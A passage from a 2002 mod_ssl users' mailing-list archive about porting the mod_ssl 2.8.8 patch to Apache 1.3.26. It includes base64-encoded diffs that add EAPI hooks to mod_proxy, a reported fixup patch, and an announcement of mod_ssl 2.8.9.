X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Wed, 19 Jun 2002 09:07:32 +0800
From: "James Bromberger" 
To: 
Subject: Re: Apache 1.3.26 and mod_ssl
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=_E7BBD864.B1D0B5A8"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James Bromberger" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--=_E7BBD864.B1D0B5A8
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: 7bit


Attached are my diffs from the 1.3.26 tarball and what I did when I
merged in the 2.8.8 rejected patches.

Is it just me, or are other people seeing these problems? Can someone
tell me if my changes look right?

Regards,

  James



-- 
  James Bromberger,
  Senior Web/Systems Administrator, JDV
  +61 8 9268 2909, +61 417 322 500
  Fax: +61 8 9266 0200

http://conf.linux.org.au/

>>> James_Bromberger@jdv.com 06/19/02 08:30am >>>

Seems that the current 2.8.8 has some problems patching into some of
the mod_proxy code:

./ap/Makefile.tmpl.rej
./modules/proxy/mod_proxy.c.rej
./modules/proxy/proxy_http.c.rej

Apart from those three files (536 bytes, 1312 bytes, 2607 bytes) it
looks clean...

	James

-- 
  James Bromberger,
  Senior Web/Systems Administrator, JDV
  +61 8 9268 2909, +61 417 322 500
  Fax: +61 8 9266 0200

http://conf.linux.org.au/ 

>>> jwoolley@apache.org 06/19/02 07:54am >>>
On Tue, 18 Jun 2002, Matthew Ruzicka wrote:

> Pardon my possible ignorance here, but has anyone come up with any
good
> work arounds for getting mod_ssl to work with the (patched) Apache
1.3.26
> since 2.8.8-1.3.24 only wants to work with 1.3.24?

I'm looking into it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org


User Support Mailing List                      modssl-users@modssl.org


Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org



--=_E7BBD864.B1D0B5A8
Content-Type: application/octet-stream; name="proxy_http.c.jebpatch"
Content-Disposition: attachment; filename="proxy_http.c.jebpatch"
Content-Transfer-Encoding: base64

KioqIHByb3h5X2h0dHAuYy5vcmlnCVdlZCBKdW4gMTkgMDg6NTU6NTIgMjAwMgotLS0gcHJveHlf
aHR0cC5jCVdlZCBKdW4gMTkgMDg6NDU6MDEgMjAwMgoqKioqKioqKioqKioqKioKKioqIDE3MCwx
NzUgKioqKgotLS0gMTcwLDE3OCAtLS0tCiAgICAgIGNvbnN0IGNoYXIgKmRhdGVzdHIsICp1cmxz
dHI7CiAgICAgIGludCByZXN1bHQsIG1ham9yLCBtaW5vcjsKICAgICAgY29uc3QgY2hhciAqY29u
dGVudF9sZW5ndGg7CisgI2lmZGVmIEVBUEkKKyAgICAgY2hhciAqcGVlcjsKKyAjZW5kaWYKICAK
ICAgICAgdm9pZCAqc2NvbmYgPSByLT5zZXJ2ZXItPm1vZHVsZV9jb25maWc7CiAgICAgIHByb3h5
X3NlcnZlcl9jb25mICpjb25mID0KKioqKioqKioqKioqKioqCioqKiAxOTEsMTk2ICoqKioKLS0t
IDE5NCwyMDUgLS0tLQogICAgICAgICAgcmV0dXJuIEhUVFBfQkFEX1JFUVVFU1Q7CiAgICAgIHVy
bHB0ciArPSAzOwogICAgICBkZXN0cG9ydCA9IERFRkFVTFRfSFRUUF9QT1JUOworICNpZmRlZiBF
QVBJCisgICAgIGFwX2hvb2tfdXNlKCJhcDo6bW9kX3Byb3h5OjpodHRwOjpoYW5kbGVyOjpzZXRf
ZGVzdHBvcnQiLCAKKyAgICAgICAgICAgICAgICAgQVBfSE9PS19TSUcyKGludCxwdHIpLCAKKyAg
ICAgICAgICAgICAgICAgQVBfSE9PS19UT1BNT1NULAorICAgICAgICAgICAgICAgICAmZGVzdHBv
cnQsIHIpOworICNlbmRpZiAvKiBFQVBJICovCiAgICAgIHN0cnAgPSBzdHJjaHIodXJscHRyLCAn
LycpOwogICAgICBpZiAoc3RycCA9PSBOVUxMKSB7CiAgICAgICAgICBkZXN0aG9zdCA9IGFwX3Bz
dHJkdXAocCwgdXJscHRyKTsKKioqKioqKioqKioqKioqCioqKiAyMjgsMjMzICoqKioKLS0tIDIz
NywyNDUgLS0tLQogICAgICAgICAgZXJyID0gYXBfcHJveHlfaG9zdDJhZGRyKHByb3h5aG9zdCwg
JnNlcnZlcl9ocCk7CiAgICAgICAgICBpZiAoZXJyICE9IE5VTEwpCiAgICAgICAgICAgICAgcmV0
dXJuIERFQ0xJTkVEOyAgICAvKiB0cnkgYW5vdGhlciAqLworICNpZmRlZiBFQVBJCisgCXBlZXIg
PSBhcF9wc3ByaW50ZihwLCAiJXM6JXUiLCBwcm94eWhvc3QsIHByb3h5cG9ydCk7ICAKKyAjZW5k
aWYKICAgICAgfQogICAgICBlbHNlIHsKICAgICAgICAgIHNlcnZlci5zaW5fcG9ydCA9IGh0b25z
KCh1bnNpZ25lZCBzaG9ydClkZXN0cG9ydCk7CioqKioqKioqKioqKioqKgoqKiogMjM0LDIzOSAq
KioqCi0tLSAyNDYsMjU0IC0tLS0KICAgICAgICAgIGVyciA9IGFwX3Byb3h5X2hvc3QyYWRkcihk
ZXN0aG9zdCwgJnNlcnZlcl9ocCk7CiAgICAgICAgICBpZiAoZXJyICE9IE5VTEwpCiAgICAgICAg
ICAgICAgcmV0dXJuIGFwX3Byb3h5ZXJyb3IociwgSFRUUF9JTlRFUk5BTF9TRVJWRVJfRVJST1Is
IGVycik7CisgI2lmZGVmIEVBUEkKKyAJcGVlciA9ICBhcF9wc3ByaW50ZihwLCAiJXM6JXUiLCBk
ZXN0aG9zdCwgZGVzdHBvcnQpOyAgCisgI2VuZGlmCiAgICAgIH0KICAKICAKKioqKioqKioqKioq
KioqCioqKiAzMDgsMzIxICoqKioKLS0tIDMyMywzNjUgLS0tLQogICAgICBmID0gYXBfYmNyZWF0
ZShwLCBCX1JEV1IgfCBCX1NPQ0tFVCk7CiAgICAgIGFwX2JwdXNoZmQoZiwgc29jaywgc29jayk7
CiAgCisgI2lmZGVmIEVBUEkKKyAgICAgeworICAgICAgICAgY2hhciAqZXJybXNnID0gTlVMTDsK
KyAgICAgICAgIGFwX2hvb2tfdXNlKCJhcDo6bW9kX3Byb3h5OjpodHRwOjpoYW5kbGVyOjpuZXdf
Y29ubmVjdGlvbiIsCisgICAgICAgICAgICAgICAgICAgICBBUF9IT09LX1NJRzQocHRyLHB0cixw
dHIscHRyKSwKKyAgICAgICAgICAgICAgICAgICAgIEFQX0hPT0tfREVDTElORShOVUxMKSwKKyAg
ICAgICAgICAgICAgICAgICAgICZlcnJtc2csIHIsIGYsIHBlZXIpOworICAgICAgICAgaWYgKGVy
cm1zZyAhPSBOVUxMKQorICAgICAgICAgICAgIHJldHVybiBhcF9wcm94eWVycm9yKHIsIEhUVFBf
QkFEX0dBVEVXQVksIGVycm1zZyk7CisgICAgIH0KKyAjZW5kaWYgLyogRUFQSSAqLworIAogICAg
ICBhcF9oYXJkX3RpbWVvdXQoInByb3h5IHNlbmQiLCByKTsKICAgICAgYXBfYnZwdXRzKGYsIHIt
Pm1ldGhvZCwgIiAiLCBwcm94eWhvc3QgPyB1cmwgOiB1cmxwdHIsICIgSFRUUC8xLjEiIENSTEYs
CiAgICAgICAgICAgICAgICBOVUxMKTsKKyAKKyAjaWZkZWYgRUFQSQorICAgICB7CisgICAgICAg
aW50IHJjID0gREVDTElORUQ7CisgICAgICAgYXBfaG9va191c2UoImFwOjptb2RfcHJveHk6Omh0
dHA6OmhhbmRsZXI6OndyaXRlX2hvc3RfaGVhZGVyIiwKKyAgICAgICAgICAgICAgICAgICBBUF9I
T09LX1NJRzYoaW50LHB0cixwdHIscHRyLGludCxwdHIpLAorICAgICAgICAgICAgICAgICAgIEFQ
X0hPT0tfREVDTElORShERUNMSU5FRCksCisgICAgICAgICAgICAgICAgICAgJnJjLCByLCBmLCBk
ZXN0aG9zdCwgZGVzdHBvcnQsIGRlc3Rwb3J0c3RyKTsKKyAgICAgICAgIGlmIChyYyA9PSBERUNM
SU5FRCkgeworICAgICAgICAgICBpZiAoZGVzdHBvcnRzdHIgIT0gTlVMTCAmJiBkZXN0cG9ydCAh
PSBERUZBVUxUX0hUVFBfUE9SVCkKKyAgICAgICAgICAgICAgIGFwX2J2cHV0cyhmLCAiSG9zdDog
IiwgZGVzdGhvc3QsICI6IiwgZGVzdHBvcnRzdHIsIENSTEYsIE5VTEwpOworICAgICAgICAgICBl
bHNlCisgICAgICAgICAgICAgICBhcF9idnB1dHMoZiwgIkhvc3Q6ICIsIGRlc3Rob3N0LCBDUkxG
LCBOVUxMKTsKKyAgICAgICAgfQorICAgICB9CisgI2Vsc2UgLyogRUFQSSAqLwogICAgICAvKiBT
ZW5kIEhvc3Q6IG5vdywgYWRkaW5nIGl0IHRvIHJlcV9oZHJzIHdvdWxkbid0IGJlIG11Y2ggYmV0
dGVyICovCiAgICAgIGlmIChkZXN0cG9ydHN0ciAhPSBOVUxMICYmIGRlc3Rwb3J0ICE9IERFRkFV
TFRfSFRUUF9QT1JUKQogICAgICAgICAgYXBfYnZwdXRzKGYsICJIb3N0OiAiLCBkZXN0aG9zdCwg
IjoiLCBkZXN0cG9ydHN0ciwgQ1JMRiwgTlVMTCk7CiAgICAgIGVsc2UKICAgICAgICAgIGFwX2J2
cHV0cyhmLCAiSG9zdDogIiwgZGVzdGhvc3QsIENSTEYsIE5VTEwpOworICNlbmRpZiAvKiBFQVBJ
ICovCiAgCiAgICAgIGlmIChjb25mLT52aWFvcHQgPT0gdmlhX2Jsb2NrKSB7CiAgICAgICAgICAv
KiBCbG9jayBhbGwgb3V0Z29pbmcgVmlhOiBoZWFkZXJzICovCg==

--=_E7BBD864.B1D0B5A8
Content-Type: application/octet-stream; name="mod_proxy.c.jebpatch"
Content-Disposition: attachment; filename="mod_proxy.c.jebpatch"
Content-Transfer-Encoding: base64

KioqIG1vZF9wcm94eS5jLm9yaWcJV2VkIEp1biAxOSAwODo1NTo1MiAyMDAyCi0tLSBtb2RfcHJv
eHkuYwlXZWQgSnVuIDE5IDA4OjQxOjMzIDIwMDIKKioqKioqKioqKioqKioqCioqKiAyMTgsMjIz
ICoqKioKLS0tIDIxOCwyMjYgLS0tLQogIHN0YXRpYyBpbnQgcHJveHlfZml4dXAocmVxdWVzdF9y
ZWMgKnIpCiAgewogICAgICBjaGFyICp1cmwsICpwOworICNpZmRlZiBFQVBJCisgICAgIGludCBy
YzsKKyAjZW5kaWYgLyogRUFQSSAqLwogIAogICAgICBpZiAoci0+cHJveHlyZXEgPT0gTk9UX1BS
T1hZIHx8IHN0cm5jbXAoci0+ZmlsZW5hbWUsICJwcm94eToiLCA2KSAhPSAwKQogICAgICAgICAg
cmV0dXJuIERFQ0xJTkVEOwoqKioqKioqKioqKioqKioKKioqIDIyNSwyMzAgKioqKgotLS0gMjI4
LDI0MSAtLS0tCiAgICAgIHVybCA9ICZyLT5maWxlbmFtZVs2XTsKICAKICAvKiBjYW5vbmljYWxp
c2UgZWFjaCBzcGVjaWZpYyBzY2hlbWUgKi8KKyAjaWZkZWYgRUFQSQorICAgICBpZiAoYXBfaG9v
a191c2UoImFwOjptb2RfcHJveHk6OmNhbm9uIiwKKyAgICAgICAgICAgICAgICAgICAgIEFQX0hP
T0tfU0lHMyhpbnQscHRyLHB0ciksCisgICAgICAgICAgICAgICAgICAgICBBUF9IT09LX0RFQ0xJ
TkUoREVDTElORUQpLAorICAgICAgICAgICAgICAgICAgICAgJnJjLCByLCB1cmwpICYmIHJjICE9
IERFQ0xJTkVEKQorICAgICAgICAgcmV0dXJuIHJjOyAgCisgICAgIGVsc2UKKyAjZW5kaWYgLyog
RUFQSSAqLwogICAgICBpZiAoc3RybmNhc2VjbXAodXJsLCAiaHR0cDoiLCA1KSA9PSAwKQogICAg
ICAgICAgcmV0dXJuIGFwX3Byb3h5X2h0dHBfY2Fub24ociwgdXJsICsgNSwgImh0dHAiLCBERUZB
VUxUX0hUVFBfUE9SVCk7CiAgICAgIGVsc2UgaWYgKHN0cm5jYXNlY21wKHVybCwgImZ0cDoiLCA0
KSA9PSAwKQoqKioqKioqKioqKioqKioKKioqIDI0MCwyNDkgKioqKgotLS0gMjUxLDI5NSAtLS0t
CiAgc3RhdGljIHZvaWQgcHJveHlfaW5pdChzZXJ2ZXJfcmVjICpyLCBwb29sICpwKQogIHsKICAg
ICAgYXBfcHJveHlfZ2FyYmFnZV9pbml0KHIsIHApOworICNpZmRlZiBFQVBJCisgICAgIGFwX2hv
b2tfdXNlKCJhcDo6bW9kX3Byb3h5Ojppbml0IiwgCisgICAgICAgICAgICAgICAgIEFQX0hPT0tf
U0lHMyh2b2lkLHB0cixwdHIpLCBBUF9IT09LX0FMTCwgciwgcCk7CisgI2VuZGlmCiAgfQogIAor
ICNpZmRlZiBFQVBJCisgc3RhdGljIHZvaWQgcHJveHlfYWRkbW9kKG1vZHVsZSAqbSkKKyB7Cisg
ICAgIC8qIGV4cG9ydDogYXBfcHJveHlfaHR0cF9jYW5vbigpIGFzIGBhcDo6bW9kX3Byb3h5Ojpo
dHRwOjpjYW5vbicgKi8KKyAgICAgYXBfaG9va19jb25maWd1cmUoImFwOjptb2RfcHJveHk6Omh0
dHA6OmNhbm9uIiwgCisgICAgICAgICAgICAgICAgICAgICAgIEFQX0hPT0tfU0lHNShpbnQscHRy
LHB0cixwdHIsaW50KSwgQVBfSE9PS19UT1BNT1NUKTsKKyAgICAgYXBfaG9va19yZWdpc3Rlcigi
YXA6Om1vZF9wcm94eTo6aHR0cDo6Y2Fub24iLCAKKyAgICAgICAgICAgICAgICAgICAgICBhcF9w
cm94eV9odHRwX2Nhbm9uLCBBUF9IT09LX05PQ1RYKTsKICAKKyAgICAgLyogZXhwb3J0OiBhcF9w
cm94eV9odHRwX2hhbmRsZXIoKSBhcyBgYXA6Om1vZF9wcm94eTo6aHR0cDo6aGFuZGxlcicgKi8K
KyAgICAgYXBfaG9va19jb25maWd1cmUoImFwOjptb2RfcHJveHk6Omh0dHA6OmhhbmRsZXIiLCAK
KyAgICAgICAgICAgICAgICAgICAgICAgQVBfSE9PS19TSUc2KGludCxwdHIscHRyLHB0cixwdHIs
aW50KSwgQVBfSE9PS19UT1BNT1NUKTsKKyAgICAgYXBfaG9va19yZWdpc3RlcigiYXA6Om1vZF9w
cm94eTo6aHR0cDo6aGFuZGxlciIsIAorICAgICAgICAgICAgICAgICAgICAgIGFwX3Byb3h5X2h0
dHBfaGFuZGxlciwgQVBfSE9PS19OT0NUWCk7CiAgCisgICAgIC8qIGV4cG9ydDogYXBfcHJveHll
cnJvcigpIGFzIGBhcDo6bW9kX3Byb3h5OjplcnJvcicgKi8KKyAgICAgYXBfaG9va19jb25maWd1
cmUoImFwOjptb2RfcHJveHk6OmVycm9yIiwgCisgICAgICAgICAgICAgICAgICAgICAgIEFQX0hP
T0tfU0lHMyhpbnQscHRyLHB0ciksIEFQX0hPT0tfVE9QTU9TVCk7CisgICAgIGFwX2hvb2tfcmVn
aXN0ZXIoImFwOjptb2RfcHJveHk6OmVycm9yIiwgCisgICAgICAgICAgICAgICAgICAgICAgYXBf
cHJveHllcnJvciwgQVBfSE9PS19OT0NUWCk7CisgICAgIHJldHVybjsKKyB9CisgCisgc3RhdGlj
IHZvaWQgcHJveHlfcmVtbW9kKG1vZHVsZSAqbSkKKyB7CisgCS8qIHJlbW92ZSB0aGUgaG9vayBy
ZWZlcmVuY2VzICovCisgICAgIGFwX2hvb2tfdW5yZWdpc3RlcigiYXA6Om1vZF9wcm94eTo6aHR0
cDo6Y2Fub24iLCBhcF9wcm94eV9odHRwX2Nhbm9uKTsKKyAgICAgYXBfaG9va191bnJlZ2lzdGVy
KCJhcDo6bW9kX3Byb3h5OjpodHRwOjpoYW5kbGVyIiwgYXBfcHJveHlfaHR0cF9oYW5kbGVyKTsK
KyAgICAgYXBfaG9va191bnJlZ2lzdGVyKCJhcDo6bW9kX3Byb3h5OjplcnJvciIsIGFwX3Byb3h5
ZXJyb3IpOworICAgICByZXR1cm47CisgfQorICNlbmRpZiAvKiBFQVBJICovCisgCiAgLyogU2Vu
ZCBhIHJlZGlyZWN0aW9uIGlmIHRoZSByZXF1ZXN0IGNvbnRhaW5zIGEgaG9zdG5hbWUgd2hpY2gg
aXMgbm90ICovCiAgLyogZnVsbHkgcXVhbGlmaWVkLCBpLmUuIGRvZXNuJ3QgaGF2ZSBhIGRvbWFp
biBuYW1lIGFwcGVuZGVkLiBTb21lIHByb3h5ICovCiAgLyogc2VydmVycyBsaWtlIE5ldHNjYXBl
J3MgYWxsb3cgdGhpcyBhbmQgYWNjZXNzIGhvc3RzIGZyb20gdGhlIGxvY2FsICovCioqKioqKioq
KioqKioqKgoqKiogMzc0LDM3OSAqKioqCi0tLSA0MjAsNDMzIC0tLS0KICAgICAgICAgICAgICAg
ICAgICogQ09OTkVDVCBpcyBhIHNwZWNpYWwgbWV0aG9kIHRoYXQgYnlwYXNzZXMgdGhlIG5vcm1h
bCBwcm94eQogICAgICAgICAgICAgICAgICAgKiBjb2RlLgogICAgICAgICAgICAgICAgICAgKi8K
KyAjaWZkZWYgRUFQSQorIAkJaWYgKCFhcF9ob29rX3VzZSgiYXA6Om1vZF9wcm94eTo6aGFuZGxl
ciIsCisgCQkJCSBBUF9IT09LX1NJRzcoaW50LHB0cixwdHIscHRyLHB0cixpbnQscHRyKSwKKyAJ
CQkJIEFQX0hPT0tfREVDTElORShERUNMSU5FRCksCisgCQkJCSAmcmMsIHIsIGNyLCB1cmwsIAor
IAkJCQkgZW50c1tpXS5ob3N0bmFtZSwgZW50c1tpXS5wb3J0LCAKKyAJCQkJIGVudHNbaV0ucHJv
dG9jb2wpIHx8IHJjID09IERFQ0xJTkVEKSB7CisgI2VuZGlmIC8qIEVBUEkgKi8KICAgICAgICAg
ICAgICAgICAgaWYgKHItPm1ldGhvZF9udW1iZXIgPT0gTV9DT05ORUNUKQogICAgICAgICAgICAg
ICAgICAgICAgcmMgPSBhcF9wcm94eV9jb25uZWN0X2hhbmRsZXIociwgY3IsIHVybCwgZW50c1tp
XS5ob3N0bmFtZSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIGVudHNbaV0ucG9ydCk7CioqKioqKioqKioqKioqKgoqKiogMzgzLDM4OCAqKioqCi0t
LSA0MzcsNDQ1IC0tLS0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIGVudHNbaV0ucG9ydCk7CiAgICAgICAgICAgICAgICAgIGVsc2UKICAgICAgICAgICAg
ICAgICAgICAgIHJjID0gREVDTElORUQ7CisgI2lmZGVmIEVBUEkKKyAJCX0KKyAjZW5kaWYgLyog
RUFQSSAqLwogIAogICAgICAgICAgICAgICAgICAvKiBhbiBlcnJvciBvciBzdWNjZXNzICovCiAg
ICAgICAgICAgICAgICAgIGlmIChyYyAhPSBERUNMSU5FRCAmJiByYyAhPSBIVFRQX0JBRF9HQVRF
V0FZKQoqKioqKioqKioqKioqKioKKioqIDM5Niw0MDEgKioqKgotLS0gNDUzLDQ2NiAtLS0tCiAg
ICAgICAqIGdpdmUgdXA/PwogICAgICAgKi8KICAKKyAjaWZkZWYgRUFQSQorICAgICBpZiAoYXBf
aG9va191c2UoImFwOjptb2RfcHJveHk6OmhhbmRsZXIiLAorICAgICAgICAgICAgICAgICAgIEFQ
X0hPT0tfU0lHNyhpbnQscHRyLHB0cixwdHIscHRyLGludCxwdHIpLAorICAgICAgICAgICAgICAg
ICAgIEFQX0hPT0tfREVDTElORShERUNMSU5FRCksCisgICAgICAgICAgICAgICAgICAgJnJjLCBy
LCBjciwgdXJsLAorICAgICAgICAgICAgICAgICAgICAgTlVMTCwgMCwgc2NoZW1lKSAmJiByYyAh
PSBERUNMSU5FRCkKKyAgICAgICAgIHJldHVybiByYzsKKyAjZW5kaWYgLyogRUFQSSAqLwogICAg
ICAvKiBoYW5kbGUgdGhlIHNjaGVtZSAqLwogICAgICBpZiAoci0+bWV0aG9kX251bWJlciA9PSBN
X0NPTk5FQ1QpIHsKICAgICAgICAgIHJldHVybiBhcF9wcm94eV9jb25uZWN0X2hhbmRsZXIociwg
Y3IsIHVybCwgTlVMTCwgMCk7CioqKioqKioqKioqKioqKgoqKiogOTk0LDk5NyAqKioqCi0tLSAx
MDU5LDEwNjggLS0tLQogICAgICBOVUxMLCAgICAgICAgICAgICAgICAgICAgICAgLyogY2hpbGRf
aW5pdCAqLwogICAgICBOVUxMLCAgICAgICAgICAgICAgICAgICAgICAgLyogY2hpbGRfZXhpdCAq
LwogICAgICBwcm94eV9kZXRlY3QgICAgICAgICAgICAgICAgLyogcG9zdCByZWFkLXJlcXVlc3Qg
Ki8KKyAjaWZkZWYgRUFQSQorICAgICxwcm94eV9hZGRtb2QsICAgICAgICAgICAgIC8qIEVBUEk6
IGFkZF9tb2R1bGUgKi8KKyAgICAgcHJveHlfcmVtbW9kLCAgICAgICAgICAgICAvKiBFQVBJOiBy
ZW1vdmVfbW9kdWxlICovCisgICAgIE5VTEwsICAgICAgICAgICAgICAgICAgICAgLyogRUFQSTog
cmV3cml0ZV9jb21tYW5kICovCisgICAgIE5VTEwgICAgICAgICAgICAgICAgICAgICAgLyogRUFQ
STogbmV3X2Nvbm5lY3Rpb24gICovCisgI2VuZGlmCiAgfTsK

--=_E7BBD864.B1D0B5A8
Content-Type: application/octet-stream; name="Makefile.tmpl.jebpatch"
Content-Disposition: attachment; filename="Makefile.tmpl.jebpatch"
Content-Transfer-Encoding: base64

KioqIE1ha2VmaWxlLnRtcGwub3JpZwlXZWQgSnVuIDE5IDA4OjMxOjA4IDIwMDIKLS0tIE1ha2Vm
aWxlLnRtcGwJV2VkIEp1biAxOSAwODozMDoxOSAyMDAyCioqKioqKioqKioqKioqKgoqKiogNywx
MyAqKioqCiAgCiAgT0JKUz1hcF9jcHlzdHJuLm8gYXBfZXhlY3ZlLm8gYXBfZm5tYXRjaC5vIGFw
X2dldHBhc3MubyBhcF9tZDVjLm8gYXBfc2lnbmFsLm8gXAogICAgICAgYXBfc2xhY2subyBhcF9z
bnByaW50Zi5vIGFwX3NoYTEubyBhcF9jaGVja3Bhc3MubyBhcF9iYXNlNjQubyBhcF9lYmNkaWMu
byBcCiEgICAgICBhcF9zdHJ0b2wubyAKICAKICAuYy5vOgogIAkkKENDKSAtYyAkKElOQ0xVREVT
KSAkKENGTEFHUykgJDwKLS0tIDcsMTMgLS0tLQogIAogIE9CSlM9YXBfY3B5c3Rybi5vIGFwX2V4
ZWN2ZS5vIGFwX2ZubWF0Y2gubyBhcF9nZXRwYXNzLm8gYXBfbWQ1Yy5vIGFwX3NpZ25hbC5vIFwK
ICAgICAgIGFwX3NsYWNrLm8gYXBfc25wcmludGYubyBhcF9zaGExLm8gYXBfY2hlY2twYXNzLm8g
YXBfYmFzZTY0Lm8gYXBfZWJjZGljLm8gXAohICAgICAgYXBfc3RydG9sLm8gYXBfaG9vay5vIGFw
X2N0eC5vIGFwX21tLm8KICAKICAuYy5vOgogIAkkKENDKSAtYyAkKElOQ0xVREVTKSAkKENGTEFH
UykgJDwK

--=_E7BBD864.B1D0B5A8--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 08:51:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA13633; Wed, 19 Jun 2002 08:50:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from david.siemens.de id IAA13628; Wed, 19 Jun 2002 08:50:03 +0200 (MET DST)
Received: from mail3.siemens.de (mail3.siemens.de [139.25.208.14])
	by david.siemens.de (8.11.6/8.11.6) with ESMTP id g5J6o2o10149
	for ; Wed, 19 Jun 2002 08:50:02 +0200 (MEST)
Received: from mars.cert.siemens.de (ust.mchp.siemens.de [139.23.201.17])
	by mail3.siemens.de (8.11.6/8.11.6) with ESMTP id g5J6o2X19891
	for ; Wed, 19 Jun 2002 08:50:02 +0200 (MEST)
Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [139.23.202.134])
	by mars.cert.siemens.de (8.12.4/8.12.4/Siemens CERT [ $Revision: 1.25 ]) with ESMTP id g5J6o2Ee011251
	for ; Wed, 19 Jun 2002 08:50:02 +0200 (CEST)
	(envelope-from ust@alaska.cert.siemens.de)
Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [127.0.0.1])
	by alaska.cert.siemens.de (8.12.4/8.12.4/alaska [ $Revision: 1.12 ]) with ESMTP id g5J6o1IC057334
	for ; Wed, 19 Jun 2002 08:50:01 +0200 (CEST)
	(envelope-from ust@alaska.cert.siemens.de)
Received: (from ust@localhost)
	by alaska.cert.siemens.de (8.12.4/8.12.4/alaska [ $Revision: 1.3 ]) id g5J6o1Ew057333
	for modssl-users@modssl.org; Wed, 19 Jun 2002 08:50:01 +0200 (CEST)
	(envelope-from ust)
Date: Wed, 19 Jun 2002 08:50:01 +0200
From: Udo Schweigert 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 and mod_ssl
Message-ID: <20020619065001.GA56803@alaska.cert.siemens.de>
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Disposition: inline
In-Reply-To: 
X-Operating-System: FreeBSD 4.6-STABLE
User-Agent: Mutt/1.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Udo Schweigert 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Jun 18, 2002 at 20:47:11 -0400, Cliff Woolley wrote:
> On Wed, 19 Jun 2002, James Bromberger wrote:
> 
>> Seems that the current 2.8.8 has some problems patching into some of
>> the mod_proxy code:
>>
>> ./ap/Makefile.tmpl.rej
>> ./modules/proxy/mod_proxy.c.rej
>> ./modules/proxy/proxy_http.c.rej
> 
> hmmmm... wonder why I didn't notice those before?  Sigh.  Anyway,
> attached is a patch (totally untested!) which *should* replace the
> missing part of the mod_ssl patch.  So after you've run ./configure
> --force, apply this patch by going to the apache_1.3.26/ directory and
> running "patch -p0 < modssl-2.8.8-1.3.26-fixup.patch".  Let me know if it
> works or breaks.  ;)
> 
> --Cliff

Works! 

Many thanks.

--
Udo Schweigert, Siemens AG   | Voice      : +49 89 636 42170
CT IC CERT, Siemens CERT     | Fax        : +49 89 636 41166
D-81730 Muenchen / Germany   | email      : udo.schweigert@siemens.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 10:51:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21774; Wed, 19 Jun 2002 10:50:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA21753; Wed, 19 Jun 2002 10:49:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 79A4F4CE787; Wed, 19 Jun 2002 10:49:56 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1987428695; Wed, 19 Jun 2002 10:01:22 +0200 (CEST)
Date: Wed, 19 Jun 2002 10:01:22 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 and mod_ssl
Message-ID: <20020619080121.GA12073@engelschall.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Jun 18, 2002, Matthew Ruzicka wrote:

> Pardon my possible ignorance here, but has anyone come up with any good
> work arounds for getting mod_ssl to work with the (patched) Apache 1.3.26
> since 2.8.8-1.3.24 only wants to work with 1.3.24?
>
> I assume a new version of mod_ssl will be on its way shortly, but was
> looking for something in the meantime to close up any possible problems.

mod_ssl 2.8.9 will be released within a few hours. Just be patient, please.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 13:51:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA04555; Wed, 19 Jun 2002 13:50:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from visp.engelschall.com id NAA04512; Wed, 19 Jun 2002 13:49:23 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E30624CE77E; Wed, 19 Jun 2002 13:49:17 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3B8C7286B6; Wed, 19 Jun 2002 13:47:02 +0200 (CEST)
